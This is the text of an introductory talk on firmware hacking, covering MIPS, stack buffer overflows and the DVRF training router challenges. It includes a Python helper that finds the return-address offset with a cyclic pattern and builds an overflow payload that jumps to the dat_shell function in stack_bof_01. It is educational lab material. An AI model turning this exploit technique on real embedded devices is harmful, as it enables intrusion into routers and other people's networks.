Intro to Hardware Firmware Hacking
Andrew Freeborn
Agenda
• The Wild West
• What’s MIPS
• Let’s break it
• Pictures!
Embedded Devices
Embedded Devices Are Awesome
• Cheap and everywhere
• Lots of options for home routers, modems, etc.
• New models every year with new features
• No real regulation of the safety or the strength of a device’s security (CyberUL to help?)
• Krebs attack / Ukraine power grid
We get it, they’re bad
TLC?
They’re not bad, they just need TLC
• Surprisingly easy to get into
• Easier if you stick to the rivers and lakes... software
• Like many problems, the issues get fixed when there is attention on them
Embedded Device Solutions
• All software updated
• Kernel updates
• Kernel hardening
• Compiler protections
• Make updating easy and secure with little effort
• Scanned for vulnerabilities
When do we get to see dat MIPS
• DVRF
• MIPS CPU
• MIPS assembly >>
• ???
• Profit
What the MIPS?
• hello.c
• MIPS binaries
• MIPS disassembly
https://www.onlinedisassembler.com/odaweb/GzjLonX7
What about security?
• Anybody can do this search and find this information
• Source: https://www.shodan.io/search?query=netgear
Show me that MIPS again
• Prologue
• Middle-logue?
• Epilogue
What’s a stack buffer overflow?
• Why do we care?
• Are there other buffer overflows?
• Source: https://en.wikipedia.org/wiki/Call_stack
Stack buffer overflows in DVRF
• Why start here?
• How many challenges are there?
• Intro: stack_bof_01, heap_overflow_01, uaf_01
• ShellCode_Required: stack_bof_02, socket_bof, socket_cmd
stack_bof_01
• Let’s run it!
stack_bof_01
• Hulk smash!
Smashed the stack, now what
• Static analysis with floss (the new strings!)
Graph me like one of your French binaries
• Lots of ways to do this
• IDA
• Online Disassembler >>
www.onlinedisassembler.com/odaweb/OXabeNP7
What’s on the menu?
• Functions
• main
• dat_shell
• other things we don’t care about
Dynamic analysis
• Debugger like GDB
• Plain GDB is not pretty
• pwndbg makes it nice >>
• Use gdb-multiarch
• This really is helpful >>
Python to the rescue
• You just need the right amount of “As”
• Provide the memory address of dat_shell
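The two bullets above are the whole method: measure how many bytes it takes to reach the saved return address, then place the address of dat_shell there. Below is an added Python example, not code from the talk or from DVRF, that does both halves: it generates a cyclic pattern whose every 4-byte window is unique (so the value pwndbg shows in the clobbered register maps back to one offset) and then builds the padded input. It assumes a little-endian 32-bit MIPS target; the address constant is a constructed placeholder, the real value comes from your own disassembly of stack_bof_01.

```python
import struct
from itertools import product
from string import ascii_uppercase, ascii_lowercase, digits

# Constructed placeholder, NOT the real address of dat_shell in stack_bof_01.
# Read the real one from IDA / the online disassembler / gdb-multiarch.
DAT_SHELL_ADDR = 0x00400950


def cyclic_pattern(length: int) -> bytes:
    """Non-repeating pattern built from (Upper, lower, digit) triplets.

    Every 4-byte window is unique for the first ~20k bytes, so the bytes that
    land in the return-address slot identify exactly one offset.
    """
    out = bytearray()
    for a, b, c in product(ascii_uppercase, ascii_lowercase, digits):
        out += f"{a}{b}{c}".encode()
        if len(out) >= length:
            break
    return bytes(out[:length])


def pattern_offset(pattern: bytes, value: int, little_endian: bool = True) -> int:
    """Map a 32-bit value seen in a register after the crash (e.g. the saved
    return address pwndbg reports) back to its offset in the pattern.
    Returns -1 if the value did not come from the pattern."""
    needle = struct.pack("<I" if little_endian else ">I", value)
    return pattern.find(needle)


def build_payload(padding: int, target: int, little_endian: bool = True) -> bytes:
    """The 'right amount of As' followed by the address that should replace the
    saved return address. With a little-endian target the address's zero high
    byte is emitted last, so a C-string copy that stops at NUL still delivers
    the three significant bytes."""
    return b"A" * padding + struct.pack("<I" if little_endian else ">I", target)


if __name__ == "__main__":
    # Stage 1: feed cyclic_pattern(300) to the binary and read the faulting value.
    # Stage 2: turn that value into an offset and build the real input.
    pat = cyclic_pattern(300)
    crash_value = struct.unpack("<I", pat[100:104])[0]  # constructed: pretend $ra held this
    offset = pattern_offset(pat, crash_value)
    print(f"offset to return address: {offset}")
    print(build_payload(offset, DAT_SHELL_ADDR).hex())
```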
Thanks!
• https://vivirytech.blogspot.com
• Twitter: @vivirytech